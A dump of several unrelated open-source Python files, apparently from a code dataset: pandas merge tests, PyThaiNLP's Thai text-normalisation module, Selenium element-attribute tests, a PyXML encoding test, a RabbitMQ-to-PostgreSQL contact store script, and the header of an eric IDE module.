OrderedDict([("left_data", [1, 2]), ("right_data", [1.0, 2.0])]), index=index
)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize(
"on,left_on,right_on,left_index,right_index,nm",
[
(["outer", "inner"], None, None, False, False, "B"),
(None, None, None, True, True, "B"),
(None, ["outer", "inner"], None, False, True, "B"),
(None, None, ["outer", "inner"], True, False, "B"),
(["outer", "inner"], None, None, False, False, None),
(None, None, None, True, True, None),
(None, ["outer", "inner"], None, False, True, None),
(None, None, ["outer", "inner"], True, False, None),
],
)
def test_merge_series(on, left_on, right_on, left_index, right_index, nm):
# GH 21220
a = pd.DataFrame(
{"A": [1, 2, 3, 4]},
index=pd.MultiIndex.from_product(
[["a", "b"], [0, 1]], names=["outer", "inner"]
),
)
b = pd.Series(
[1, 2, 3, 4],
index=pd.MultiIndex.from_product(
[["a", "b"], [1, 2]], names=["outer", "inner"]
),
name=nm,
)
expected = pd.DataFrame(
{"A": [2, 4], "B": [1, 3]},
index=pd.MultiIndex.from_product([["a", "b"], [1]], names=["outer", "inner"]),
)
if nm is not None:
result = pd.merge(
a,
b,
on=on,
left_on=left_on,
right_on=right_on,
left_index=left_index,
right_index=right_index,
)
tm.assert_frame_equal(result, expected)
else:
msg = "Cannot merge a Series without a name"
with pytest.raises(ValueError, match=msg):
result = pd.merge(
a,
b,
on=on,
left_on=left_on,
right_on=right_on,
left_index=left_index,
right_index=right_index,
)
@pytest.mark.parametrize(
"col1, col2, kwargs, expected_cols",
[
(0, 0, dict(suffixes=("", "_dup")), ["0", "0_dup"]),
(0, 0, dict(suffixes=(None, "_dup")), [0, "0_dup"]),
(0, 0, dict(suffixes=("_x", "_y")), ["0_x", "0_y"]),
(0, 0, dict(suffixes=["_x", "_y"]), ["0_x", "0_y"]),
("a", 0, dict(suffixes=(None, "_y")), ["a", 0]),
(0.0, 0.0, dict(suffixes=("_x", None)), ["0.0_x", 0.0]),
("b", "b", dict(suffixes=(None, "_y")), ["b", "b_y"]),
("a", "a", dict(suffixes=("_x", None)), ["a_x", "a"]),
("a", "b", dict(suffixes=("_x", None)), ["a", "b"]),
("a", "a", dict(suffixes=(None, "_x")), ["a", "a_x"]),
(0, 0, dict(suffixes=("_a", None)), ["0_a", 0]),
("a", "a", dict(), ["a_x", "a_y"]),
(0, 0, dict(), ["0_x", "0_y"]),
],
)
def test_merge_suffix(col1, col2, kwargs, expected_cols):
# issue: 24782
a = pd.DataFrame({col1: [1, 2, 3]})
b = pd.DataFrame({col2: [4, 5, 6]})
expected = pd.DataFrame([[1, 4], [2, 5], [3, 6]], columns=expected_cols)
result = a.merge(b, left_index=True, right_index=True, **kwargs)
tm.assert_frame_equal(result, expected)
result = pd.merge(a, b, left_index=True, right_index=True, **kwargs)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize(
"how,expected",
[
(
"right",
DataFrame(
{"A": [100, 200, 300], "B1": [60, 70, np.nan], "B2": [600, 700, 800]}
),
),
(
"outer",
DataFrame(
{
"A": [100, 200, 1, 300],
"B1": [60, 70, 80, np.nan],
"B2": [600, 700, np.nan, 800],
}
),
),
],
)
def test_merge_duplicate_suffix(how, expected):
left_df = DataFrame({"A": [100, 200, 1], "B": [60, 70, 80]})
right_df = DataFrame({"A": [100, 200, 300], "B": [600, 700, 800]})
result = merge(left_df, right_df, on="A", how=how, suffixes=("_x", "_x"))
expected.columns = ["A", "B_x", "B_x"]
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize(
"col1, col2, suffixes",
[("a", "a", (None, None)), ("a", "a", ("", None)), (0, 0, (None, ""))],
)
def test_merge_suffix_error(col1, col2, suffixes):
# issue: 24782
a = pd.DataFrame({col1: [1, 2, 3]})
b = pd.DataFrame({col2: [3, 4, 5]})
# TODO: might reconsider current raise behaviour, see issue 24782
msg = "columns overlap but no suffix specified"
with pytest.raises(ValueError, match=msg):
pd.merge(a, b, left_index=True, right_index=True, suffixes=suffixes)
@pytest.mark.parametrize("suffixes", [{"left", "right"}, {"left": 0, "right": 0}])
def test_merge_suffix_warns(suffixes):
a = pd.DataFrame({"a": [1, 2, 3]})
b = pd.DataFrame({"b": [3, 4, 5]})
with tm.assert_produces_warning(FutureWarning):
pd.merge(a, b, left_index=True, right_index=True, suffixes={"left", "right"})
@pytest.mark.parametrize(
"col1, col2, suffixes, msg",
[
("a", "a", ("a", "b", "c"), r"too many values to unpack \(expected 2\)"),
("a", "a", tuple("a"), r"not enough values to unpack \(expected 2, got 1\)"),
],
)
def test_merge_suffix_length_error(col1, col2, suffixes, msg):
a = pd.DataFrame({col1: [1, 2, 3]})
b = pd.DataFrame({col2: [3, 4, 5]})
with pytest.raises(ValueError, match=msg):
pd.merge(a, b, left_index=True, right_index=True, suffixes=suffixes)
@pytest.mark.parametrize("cat_dtype", ["one", "two"])
@pytest.mark.parametrize("reverse", [True, False])
def test_merge_equal_cat_dtypes(cat_dtype, reverse):
# see gh-22501
cat_dtypes = {
"one": CategoricalDtype(categories=["a", "b", "c"], ordered=False),
"two": CategoricalDtype(categories=["a", "b", "c"], ordered=False),
}
df1 = DataFrame(
{"foo": Series(["a", "b", "c"]).astype(cat_dtypes["one"]), "left": [1, 2, 3]}
).set_index("foo")
data_foo = ["a", "b", "c"]
data_right = [1, 2, 3]
if reverse:
data_foo.reverse()
data_right.reverse()
df2 = DataFrame(
{"foo": Series(data_foo).astype(cat_dtypes[cat_dtype]), "right": data_right}
).set_index("foo")
result = df1.merge(df2, left_index=True, right_index=True)
expected = DataFrame(
{
"left": [1, 2, 3],
"right": [1, 2, 3],
"foo": Series(["a", "b", "c"]).astype(cat_dtypes["one"]),
}
).set_index("foo")
tm.assert_frame_equal(result, expected)
def test_merge_equal_cat_dtypes2():
# see gh-22501
cat_dtype = CategoricalDtype(categories=["a", "b", "c"], ordered=False)
# Test Data
df1 = DataFrame(
{"foo": Series(["a", "b"]).astype(cat_dtype), "left": [1, 2]}
).set_index("foo")
df2 = DataFrame(
{"foo": Series(["a", "b", "c"]).astype(cat_dtype), "right": [3, 2, 1]}
).set_index("foo")
result = df1.merge(df2, left_index=True, right_index=True)
expected = DataFrame(
{"left": [1, 2], "right": [3, 2], "foo": Series(["a", "b"]).astype(cat_dtype)}
).set_index("foo")
tm.assert_frame_equal(result, expected)
def test_merge_on_cat_and_ext_array():
# GH 28668
right = DataFrame(
{"a": Series([pd.Interval(0, 1), pd.Interval(1, 2)], dtype="interval")}
)
left = right.copy()
left["a"] = left["a"].astype("category")
result = pd.merge(left, right, how="inner", on="a")
expected = right.copy()
tm.assert_frame_equal(result, expected)
def test_merge_multiindex_columns():
# Issue #28518
# Verify that merging two dataframes give the expected labels
# The original cause of this issue come from a bug lexsort_depth and is tested in
# test_lexsort_depth
letters = ["a", "b", "c", "d"]
numbers = ["1", "2", "3"]
index = pd.MultiIndex.from_product((letters, numbers), names=["outer", "inner"])
frame_x = pd.DataFrame(columns=index)
frame_x["id"] = ""
frame_y = pd.DataFrame(columns=index)
frame_y["id"] = ""
l_suf = "_x"
r_suf = "_y"
result = frame_x.merge(frame_y, on="id", suffixes=((l_suf, r_suf)))
# Constructing the expected results
expected_labels = [l + l_suf for l in letters] + [l + r_suf for l in letters]
expected_index = pd.MultiIndex.from_product(
[expected_labels, numbers], names=["outer", "inner"]
)
expected = pd.DataFrame(columns=expected_index)
expected["id"] = ""
tm.assert_frame_equal(result, expected)
def test_merge_datetime_upcast_dtype():
# https://github.com/pandas-dev/pandas/issues/31208
df1 = pd.DataFrame({"x": ["a", "b", "c"], "y": ["1", "2", "4"]})
df2 = pd.DataFrame(
{"y": ["1", "2", "3"], "z": pd.to_datetime(["2000", "2001", "2002"])}
)
result = pd.merge(df1, df2, how="left", on="y")
expected = pd.DataFrame(
{
"x": ["a", "b", "c"],
"y": ["1", "2", "4"],
"z": pd.to_datetime(["2000", "2001", "NaT"]),
}
)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("n_categories", [5, 128])
def test_categorical_non_unique_monotonic(n_categories):
# GH 28189
# With n_categories as 5, we test the int8 case is hit in libjoin,
# with n_categories as 128 we test the int16 case.
left_index = CategoricalIndex([0] + list(range(n_categories)))
df1 = DataFrame(range(n_categories + 1), columns=["value"], index=left_index)
df2 = DataFrame(
[[6]],
columns=["value"],
index=CategoricalIndex([0], categories=np.arange(n_categories)),
)
result = merge(df1, df2, how="left", left_index=True, right_index=True)
expected = DataFrame(
[[i, 6.0] if i < 2 else [i, np.nan] for i in range(n_categories + 1)],
columns=["value_x", "value_y"],
index=left_index,
)
tm.assert_frame_equal(expected, result)
| bsd-3-clause | 2,661,297,586,341,190,700 | 33.908766 | 88 | 0.486048 | false |
PyThaiNLP/pythainlp | pythainlp/util/normalize.py | 1 | 7109 | # -*- coding: utf-8 -*-
"""
Text normalization
"""
import re
import warnings
from pythainlp import thai_above_vowels as above_v
from pythainlp import thai_below_vowels as below_v
from pythainlp import thai_follow_vowels as follow_v
from pythainlp import thai_lead_vowels as lead_v
from pythainlp import thai_tonemarks as tonemarks
_DANGLING_CHARS = f"{above_v}{below_v}{tonemarks}\u0e3a\u0e4c\u0e4d\u0e4e"
_RE_REMOVE_DANGLINGS = re.compile(f"^[{_DANGLING_CHARS}]+")
_ZERO_WIDTH_CHARS = "\u200b\u200c" # ZWSP, ZWNJ
_REORDER_PAIRS = [
("\u0e40\u0e40", "\u0e41"), # Sara E + Sara E -> Sara Ae
(
f"([{tonemarks}\u0e4c]+)([{above_v}{below_v}]+)",
"\\2\\1",
), # TONE/Thanthakhat + ABV/BLW VOWEL -> ABV/BLW VOWEL + TONE/Thanthakhat
(
f"\u0e4d([{tonemarks}]*)\u0e32",
"\\1\u0e33",
), # Nikhahit + TONEMARK + Sara Aa -> TONEMARK + Sara Am
(
f"([{follow_v}]+)([{tonemarks}]+)",
"\\2\\1",
), # FOLLOW VOWEL + TONEMARK+ -> TONEMARK + FOLLOW VOWEL
]
# VOWELS + Phinthu, Thanthakhat, Nikhahit, Yamakkan
_NOREPEAT_CHARS = (
f"{follow_v}{lead_v}{above_v}{below_v}\u0e3a\u0e4c\u0e4d\u0e4e"
)
_NOREPEAT_PAIRS = list(
zip([f"({ch}[ ]*)+{ch}" for ch in _NOREPEAT_CHARS], _NOREPEAT_CHARS)
)
_RE_TONEMARKS = re.compile(f"[{tonemarks}]+")
_RE_REMOVE_NEWLINES = re.compile("[ \n]*\n[ \n]*")
def _last_char(matchobj): # to be used with _RE_NOREPEAT_TONEMARKS
return matchobj.group(0)[-1]
def remove_dangling(text: str) -> str:
"""
Remove Thai non-base characters at the beginning of text.
This is a common "typo", especially for input field in a form,
as these non-base characters can be visually hidden from user
who may accidentally typed them in.
A character to be removed should be both:
* tone mark, above vowel, below vowel, or non-base sign AND
* located at the beginning of the text
:param str text: input text
:return: text without dangling Thai characters at the beginning
:rtype: str
"""
return _RE_REMOVE_DANGLINGS.sub("", text)
def remove_dup_spaces(text: str) -> str:
"""
Remove duplicate spaces. Replace multiple spaces with one space.
Multiple newline characters and empty lines will be replaced
with one newline character.
:param str text: input text
:return: text without duplicated spaces and newlines
:rtype: str
"""
while " " in text:
text = text.replace(" ", " ")
text = _RE_REMOVE_NEWLINES.sub("\n", text)
text = text.strip()
return text
def remove_tonemark(text: str) -> str:
"""
Remove all Thai tone marks from the text.
Thai script has four tone marks indicating four tones as follows:
* Down tone (Thai: ไม้เอก _่ )
* Falling tone (Thai: ไม้โท _้ )
* High tone (Thai: ไม้ตรี _๊ )
* Rising tone (Thai: ไม้จัตวา _๋ )
Putting wrong tone mark is a common mistake in Thai writing.
By removing tone marks from the string, it could be used to
for a approximate string matching
:param str text: input text
:return: text without Thai tone marks
:rtype: str
:Example:
::
from pythainlp.util import delete_tone
delete_tone('สองพันหนึ่งร้อยสี่สิบเจ็ดล้านสี่แสนแปดหมื่นสามพันหกร้อยสี่สิบเจ็ด')
# output: สองพันหนึงรอยสีสิบเจ็ดลานสีแสนแปดหมืนสามพันหกรอยสีสิบเจ็ด
"""
for ch in tonemarks:
while ch in text:
text = text.replace(ch, "")
return text
def remove_zw(text: str) -> str:
"""
Remove zero-width characters.
These non-visible characters may cause unexpected result from the
user's point of view. Removing them can make string matching more robust.
Characters to be removed:
* Zero-width space (ZWSP)
* Zero-width non-joiner (ZWJP)
:param str text: input text
:return: text without zero-width characters
:rtype: str
"""
for ch in _ZERO_WIDTH_CHARS:
while ch in text:
text = text.replace(ch, "")
return text
def reorder_vowels(text: str) -> str:
"""
Reorder vowels and tone marks to the standard logical order/spelling.
Characters in input text will be reordered/transformed,
according to these rules:
* Sara E + Sara E -> Sara Ae
* Nikhahit + Sara Aa -> Sara Am
* tone mark + non-base vowel -> non-base vowel + tone mark
* follow vowel + tone mark -> tone mark + follow vowel
:param str text: input text
:return: text with vowels and tone marks in the standard logical order
:rtype: str
"""
for pair in _REORDER_PAIRS:
text = re.sub(pair[0], pair[1], text)
return text
def remove_repeat_vowels(text: str) -> str:
"""
Remove repeating vowels, tone marks, and signs.
This function will call reorder_vowels() first, to make sure that
double Sara E will be converted to Sara Ae and not be removed.
:param str text: input text
:return: text without repeating Thai vowels, tone marks, and signs
:rtype: str
"""
text = reorder_vowels(text)
for pair in _NOREPEAT_PAIRS:
text = re.sub(pair[0], pair[1], text)
# remove repeating tone marks, use last tone mark
text = _RE_TONEMARKS.sub(_last_char, text)
return text
def normalize(text: str) -> str:
"""
Normalize and clean Thai text with normalizing rules as follows:
* Remove zero-width spaces
* Remove duplicate spaces
* Reorder tone marks and vowels to standard order/spelling
* Remove duplicate vowels and signs
* Remove duplicate tone marks
* Remove dangling non-base characters at the beginning of text
normalize() simply call remove_zw(), remove_dup_spaces(),
remove_repeat_vowels(), and remove_dangling(), in that order.
If a user wants to customize the selection or the order of rules
to be applied, they can choose to call those functions by themselves.
Note: for Unicode normalization, see unicodedata.normalize().
:param str text: input text
:return: normalized text according to the fules
:rtype: str
:Example:
::
from pythainlp.util import normalize
normalize('เเปลก') # starts with two Sara E
# output: แปลก
normalize('นานาาา')
# output: นานา
"""
text = remove_zw(text)
text = remove_dup_spaces(text)
text = remove_repeat_vowels(text)
text = remove_dangling(text)
return text
def delete_tone(text: str) -> str:
"""
DEPRECATED: Please use remove_tonemark().
"""
warnings.warn(
"delete_tone is deprecated, use remove_tonemark instead",
DeprecationWarning,
)
return remove_tonemark(text)
| apache-2.0 | -8,998,425,384,468,573,000 | 27.1875 | 88 | 0.637103 | false |
sankha93/selenium | py/test/selenium/webdriver/common/element_attribute_tests.py | 1 | 11886 | # Licensed to the Software Freedom Conservancy (SFC) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The SFC licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import unittest
import pytest
class ElementAttributeTests(unittest.TestCase):
def testShouldReturnNullWhenGettingTheValueOfAnAttributeThatIsNotListed(self):
self._loadSimplePage()
head = self.driver.find_element_by_xpath("/html")
attribute = head.get_attribute("cheese")
self.assertTrue(attribute is None)
def testShouldReturnNullWhenGettingSrcAttributeOfInvalidImgTag(self):
self._loadSimplePage()
img = self.driver.find_element_by_id("invalidImgTag")
img_attr = img.get_attribute("src")
self.assertEqual(img_attr, None)
def testShouldReturnAnAbsoluteUrlWhenGettingSrcAttributeOfAValidImgTag(self):
self._loadSimplePage()
img = self.driver.find_element_by_id("validImgTag")
img_attr = img.get_attribute("src")
self.assertTrue("icon.gif" in img_attr)
def testShouldReturnAnAbsoluteUrlWhenGettingHrefAttributeOfAValidAnchorTag(self):
self._loadSimplePage()
img = self.driver.find_element_by_id("validAnchorTag")
img_attr = img.get_attribute("href")
self.assertTrue("icon.gif" in img_attr)
def testShouldReturnEmptyAttributeValuesWhenPresentAndTheValueIsActuallyEmpty(self):
self._loadSimplePage()
body = self.driver.find_element_by_xpath("//body")
self.assertEqual("", body.get_attribute("style"))
def testShouldReturnTheValueOfTheDisabledAttributeAsFalseIfNotSet(self):
self._loadPage("formPage")
inputElement = self.driver.find_element_by_xpath("//input[@id='working']")
self.assertEqual(None, inputElement.get_attribute("disabled"))
self.assertTrue(inputElement.is_enabled())
pElement = self.driver.find_element_by_id("peas")
self.assertEqual(None, pElement.get_attribute("disabled"))
self.assertTrue(pElement.is_enabled())
def testShouldReturnTheValueOfTheIndexAttrbuteEvenIfItIsMissing(self):
self._loadPage("formPage")
multiSelect = self.driver.find_element_by_id("multi")
options = multiSelect.find_elements_by_tag_name("option")
self.assertEqual("1", options[1].get_attribute("index"))
def testShouldIndicateTheElementsThatAreDisabledAreNotis_enabled(self):
self._loadPage("formPage")
inputElement = self.driver.find_element_by_xpath("//input[@id='notWorking']")
self.assertFalse(inputElement.is_enabled())
inputElement = self.driver.find_element_by_xpath("//input[@id='working']")
self.assertTrue(inputElement.is_enabled())
def testElementsShouldBeDisabledIfTheyAreDisabledUsingRandomDisabledStrings(self):
self._loadPage("formPage")
disabledTextElement1 = self.driver.find_element_by_id("disabledTextElement1")
self.assertFalse(disabledTextElement1.is_enabled())
disabledTextElement2 = self.driver.find_element_by_id("disabledTextElement2")
self.assertFalse(disabledTextElement2.is_enabled())
disabledSubmitElement = self.driver.find_element_by_id("disabledSubmitElement")
self.assertFalse(disabledSubmitElement.is_enabled())
def testShouldIndicateWhenATextAreaIsDisabled(self):
self._loadPage("formPage")
textArea = self.driver.find_element_by_xpath("//textarea[@id='notWorkingArea']")
self.assertFalse(textArea.is_enabled())
def testShouldThrowExceptionIfSendingKeysToElementDisabledUsingRandomDisabledStrings(self):
self._loadPage("formPage")
disabledTextElement1 = self.driver.find_element_by_id("disabledTextElement1")
try:
disabledTextElement1.send_keys("foo")
self.fail("Should have thrown exception")
except Exception:
pass
self.assertEqual("", disabledTextElement1.text)
disabledTextElement2 = self.driver.find_element_by_id("disabledTextElement2")
try:
disabledTextElement2.send_keys("bar")
self.fail("Should have thrown exception")
except Exception:
pass
self.assertEqual("", disabledTextElement2.text)
def testShouldIndicateWhenASelectIsDisabled(self):
self._loadPage("formPage")
enabled = self.driver.find_element_by_name("selectomatic")
disabled = self.driver.find_element_by_name("no-select")
self.assertTrue(enabled.is_enabled())
self.assertFalse(disabled.is_enabled())
def testShouldReturnTheValueOfCheckedForACheckboxEvenIfItLacksThatAttribute(self):
self._loadPage("formPage")
checkbox = self.driver.find_element_by_xpath("//input[@id='checky']")
self.assertTrue(checkbox.get_attribute("checked") is None)
checkbox.click()
self.assertEqual("true", checkbox.get_attribute("checked"))
def testShouldReturnTheValueOfSelectedForRadioButtonsEvenIfTheyLackThatAttribute(self):
self._loadPage("formPage")
neverSelected = self.driver.find_element_by_id("cheese")
initiallyNotSelected = self.driver.find_element_by_id("peas")
initiallySelected = self.driver.find_element_by_id("cheese_and_peas")
self.assertTrue(neverSelected.get_attribute("checked") is None, )
self.assertTrue(initiallyNotSelected.get_attribute("checked") is None, )
self.assertEqual("true", initiallySelected.get_attribute("checked"))
initiallyNotSelected.click()
self.assertEqual(neverSelected.get_attribute("selected"), None)
self.assertEqual("true", initiallyNotSelected.get_attribute("checked"))
self.assertEqual(initiallySelected.get_attribute("checked"), None)
def testShouldReturnTheValueOfSelectedForOptionsInSelectsEvenIfTheyLackThatAttribute(self):
self._loadPage("formPage")
selectBox = self.driver.find_element_by_xpath("//select[@name='selectomatic']")
options = selectBox.find_elements_by_tag_name("option")
one = options[0]
two = options[1]
self.assertTrue(one.is_selected())
self.assertFalse(two.is_selected())
self.assertEqual("true", one.get_attribute("selected"))
self.assertEqual(two.get_attribute("selected"), None)
def testShouldReturnValueOfClassAttributeOfAnElement(self):
self._loadPage("xhtmlTest")
heading = self.driver.find_element_by_xpath("//h1")
classname = heading.get_attribute("class")
self.assertEqual("header", classname)
# Disabled due to issues with Frames
# def testShouldReturnValueOfClassAttributeOfAnElementAfterSwitchingIFrame(self):
# self._loadPage("iframes")
# self.driver.switch_to.frame("iframe1")
#
# wallace = self.driver.find_element_by_xpath("//div[@id='wallace']")
# classname = wallace.get_attribute("class")
# self.assertEqual("gromit", classname)
def testShouldReturnTheContentsOfATextAreaAsItsValue(self):
self._loadPage("formPage")
value = self.driver.find_element_by_id("withText").get_attribute("value")
self.assertEqual("Example text", value)
def testShouldReturnTheContentsOfATextAreaAsItsValueWhenSetToNonNorminalTrue(self):
self._loadPage("formPage")
e = self.driver.find_element_by_id("withText")
self.driver.execute_script("arguments[0].value = 'tRuE'", e)
value = e.get_attribute("value")
self.assertEqual("tRuE", value)
def testShouldTreatReadonlyAsAValue(self):
self._loadPage("formPage")
element = self.driver.find_element_by_name("readonly")
readOnlyAttribute = element.get_attribute("readonly")
textInput = self.driver.find_element_by_name("x")
notReadOnly = textInput.get_attribute("readonly")
self.assertNotEqual(readOnlyAttribute, notReadOnly)
def testShouldGetNumericAtribute(self):
self._loadPage("formPage")
element = self.driver.find_element_by_id("withText")
self.assertEqual("5", element.get_attribute("rows"))
def testCanReturnATextApproximationOfTheStyleAttribute(self):
self._loadPage("javascriptPage")
style = self.driver.find_element_by_id("red-item").get_attribute("style")
self.assertTrue("background-color" in style.lower())
def testShouldCorrectlyReportValueOfColspan(self):
self._loadPage("tables")
th1 = self.driver.find_element_by_id("th1")
td2 = self.driver.find_element_by_id("td2")
self.assertEqual("th1", th1.get_attribute("id"))
self.assertEqual("3", th1.get_attribute("colspan"))
self.assertEqual("td2", td2.get_attribute("id"))
self.assertEquals("2", td2.get_attribute("colspan"))
def testCanRetrieveTheCurrentValueOfATextFormField_textInput(self):
self._loadPage("formPage")
element = self.driver.find_element_by_id("working")
self.assertEqual("", element.get_attribute("value"))
element.send_keys("hello world")
self.assertEqual("hello world", element.get_attribute("value"))
def testCanRetrieveTheCurrentValueOfATextFormField_emailInput(self):
self._loadPage("formPage")
element = self.driver.find_element_by_id("email")
self.assertEqual("", element.get_attribute("value"))
element.send_keys("[email protected]")
self.assertEqual("[email protected]", element.get_attribute("value"))
def testCanRetrieveTheCurrentValueOfATextFormField_textArea(self):
self._loadPage("formPage")
element = self.driver.find_element_by_id("emptyTextArea")
self.assertEqual("", element.get_attribute("value"))
element.send_keys("hello world")
self.assertEqual("hello world", element.get_attribute("value"))
@pytest.mark.ignore_chrome
def testShouldReturnNullForNonPresentBooleanAttributes(self):
self._loadPage("booleanAttributes")
element1 = self.driver.find_element_by_id("working")
self.assertEqual(None, element1.get_attribute("required"))
@pytest.mark.ignore_ie
def testShouldReturnTrueForPresentBooleanAttributes(self):
self._loadPage("booleanAttributes")
element1 = self.driver.find_element_by_id("emailRequired")
self.assertEqual("true", element1.get_attribute("required"))
element2 = self.driver.find_element_by_id("emptyTextAreaRequired")
self.assertEqual("true", element2.get_attribute("required"))
element3 = self.driver.find_element_by_id("inputRequired")
self.assertEqual("true", element3.get_attribute("required"))
element4 = self.driver.find_element_by_id("textAreaRequired")
self.assertEqual("true", element4.get_attribute("required"))
def tesShouldGetUnicodeCharsFromAttribute(self):
self._loadPage("formPage")
title = self.driver.find_element_by_id("vsearchGadget").get_attribute("title")
self.assertEqual('Hvad s\xf8ger du?', title)
def _pageURL(self, name):
return self.webserver.where_is(name + '.html')
def _loadSimplePage(self):
self._loadPage("simpleTest")
def _loadPage(self, name):
self.driver.get(self._pageURL(name))
| apache-2.0 | -259,758,264,384,351,170 | 44.193916 | 95 | 0.698553 | false |
Pikecillo/genna | external/PyXML-0.8.4/test/test_encodings.py | 1 | 1292 | #!/usr/bin/env python
"""
This will show russian text in koi8-r encoding.
"""
from xml.parsers import expat
import string
# Produces ImportError in 1.5, since this test can't possibly pass there
import codecs
class XMLTree:
def __init__(self):
pass
# Define a handler for start element events
def StartElement(self, name, attrs ):
#name = name.encode()
print "<", repr(name), ">"
print "attr name:", attrs.get("name",unicode("")).encode("koi8-r")
print "attr value:", attrs.get("value",unicode("")).encode("koi8-r")
def EndElement(self, name ):
print "</", repr(name), ">"
def CharacterData(self, data ):
if string.strip(data):
data = data.encode("koi8-r")
print data
def LoadTree(self, filename):
# Create a parser
Parser = expat.ParserCreate()
# Tell the parser what the start element handler is
Parser.StartElementHandler = self.StartElement
Parser.EndElementHandler = self.EndElement
Parser.CharacterDataHandler = self.CharacterData
# Parse the XML File
ParserStatus = Parser.Parse(open(filename,'r').read(), 1)
def runTest():
win = XMLTree()
win.LoadTree("enc_test.xml")
return win
runTest()
| gpl-2.0 | 5,979,302,557,912,319,000 | 24.333333 | 76 | 0.619969 | false |
CRAWLZSTAGE/infra | store/store.py | 1 | 6657 | import os, sys
import pika
import json
import time
import traceback
from peewee import *
# DEBUG = int(os.environ.get('DEBUG'))
MQTT_HOST = os.environ.get('MQTT_HOST')
MQTT_USER = os.environ.get('MQTT_USER')
MQTT_PASSWORD = os.environ.get('MQTT_PASSWORD')
import sys
import signal
def handler(signum, frame):
sys.exit(1)
signal.signal(signal.SIGTERM, handler)
"""
PSQL ORM courtesy of PeeWee
No need for schema.sql since PeeWee can take care of this for us!
"""
from databaseModel import psql_db, BaseModel, FacebookContact, LinkedInContact, FourSquareContact, GoogleContact, updateFacebookContact, updateLinkedInContact, updateFourSquareContact, updateGoogleContact
while True:
try:
psql_db.connect()
break
except Exception as e:
sys.stderr.write("Unable to connect to PSQL: \n" + str(e) + "\n")
traceback.print_exc()
sys.stderr.flush()
time.sleep(5)
if not FacebookContact.table_exists():
FacebookContact.create_table()
if not LinkedInContact.table_exists():
LinkedInContact.create_table()
if not FourSquareContact.table_exists():
FourSquareContact.create_table()
if not GoogleContact.table_exists():
GoogleContact.create_table()
"""
if not FTSFacebookContact.table_exists():
FTSFacebookContact.create_table()
if not FTSLinkedInContact.table_exists():
FTSLinkedInContact.create_table()
if not FTSFourSquareContact.table_exists():
FTSFourSquareContact.create_table()
if not FTSGoogleContact.table_exists():
FTSGoogleContact.create_table()
"""
"""
RabbitMQ support courtesy of Pika
MQTT tutorial from
https://cuongba.com/install-rabbitmq-and-send-json-data-with-python-on-ubuntu/
"""
while True:
try:
_credentials = pika.PlainCredentials(MQTT_USER, MQTT_PASSWORD)
mqtt_connection = pika.BlockingConnection(pika.ConnectionParameters(host=MQTT_HOST, credentials=_credentials))
break
except Exception:
time.sleep(5)
pqdata = dict()
pqdata['x-max-priority'] = 5
ingress_channel = mqtt_connection.channel()
ingress_channel.exchange_declare(exchange='admin', type='fanout')
ingress_channel.queue_declare(queue='store', durable=True, arguments=pqdata)
admin_queue = ingress_channel.queue_declare(arguments=pqdata)
ingress_channel.queue_bind(exchange="admin", queue=admin_queue.method.queue)
"""
Message Handling
This is real ugly, should introduce classes
"""
def callback(ch, method, properties, body):
try:
data = json.loads(body)
if not data.has_key("org_name") or not data.has_key("protocol"):
return
if not data.has_key("facebook_resource_locator") and not data.has_key("linkedin_resource_locator") and not data.has_key("foursquare_resource_locator") and not data.has_key("google_resource_locator"):
raise Exception("Unable to identify resource")
if data["protocol"] == "fb":
newContact = FacebookContact.select().where(FacebookContact.facebook_resource_locator == data["facebook_resource_locator"])
if newContact.exists():
newContact = newContact.get()
else:
newContact = FacebookContact(facebook_resource_locator=data["facebook_resource_locator"])
try:
newContact.save(force_insert=True)
except Exception, e:
"""
Collide, should not happen!
"""
sys.stderr.write("Collision occured: " + str(e))
psql_db.rollback()
updateFacebookContact(data)
elif data["protocol"] == "linkedin":
newContact = LinkedInContact.select().where(LinkedInContact.linkedin_resource_locator == data["linkedin_resource_locator"])
if newContact.exists():
newContact = newContact.get()
else:
newContact = LinkedInContact(linkedin_resource_locator=data["linkedin_resource_locator"])
try:
newContact.save(force_insert=True)
except Exception, e:
sys.stderr.write("Collision occured: " + str(e))
psql_db.rollback()
updateLinkedInContact(data)
elif data["protocol"] == "fsquare":
newContact = FourSquareContact.select().where(FourSquareContact.foursquare_resource_locator == data["foursquare_resource_locator"])
if newContact.exists():
newContact = newContact.get()
else:
newContact = FourSquareContact(foursquare_resource_locator=data["foursquare_resource_locator"])
try:
newContact.save(force_insert=True)
except Exception, e:
"""
Collide, should not happen!
"""
sys.stderr.write("Collision occured: " + str(e))
psql_db.rollback()
updateFourSquareContact(data)
elif data["protocol"] == "google":
newContact = GoogleContact.select().where(GoogleContact.google_resource_locator == data["google_resource_locator"])
if newContact.exists():
newContact = newContact.get()
else:
newContact = GoogleContact(google_resource_locator=data["google_resource_locator"])
try:
newContact.save(force_insert=True)
except Exception, e:
"""
Collide, should not happen!
"""
sys.stderr.write("Collision occured: " + str(e))
psql_db.rollback()
updateGoogleContact(data)
except Exception as e:
sys.stderr.write(str(e) + "Unable to parse body: \n" + body + "\n")
traceback.print_exc()
sys.stderr.flush()
finally:
ingress_channel.basic_ack(delivery_tag = method.delivery_tag)
def admin_callback(ch, method, properties, body):
try:
data = json.loads(body)
return
except Exception as e:
sys.stderr.write(str(e) + "Unable to fetch: \n" + body + "\n")
traceback.print_exc()
try:
psql_db.rollback()
except:
psql_db.close()
psql_db.connect()
sys.stderr.flush()
finally:
ingress_channel.basic_ack(delivery_tag = method.delivery_tag)
ingress_channel.basic_qos(prefetch_count=1)
ingress_channel.basic_consume(callback, queue='store')
ingress_channel.basic_consume(admin_callback, queue=admin_queue.method.queue)
ingress_channel.start_consuming()
| mit | -2,677,906,427,138,695,700 | 34.59893 | 207 | 0.625507 | false |
davy39/eric | E5Gui/E5MainWindow.py | 1 | 2118 | # -*- coding: utf-8 -*-
# Copyright (c) 2012 - 2014 Detlev Offenbach <[email protected]>
#
"""
Module implementing a main window class with styling support.
"""
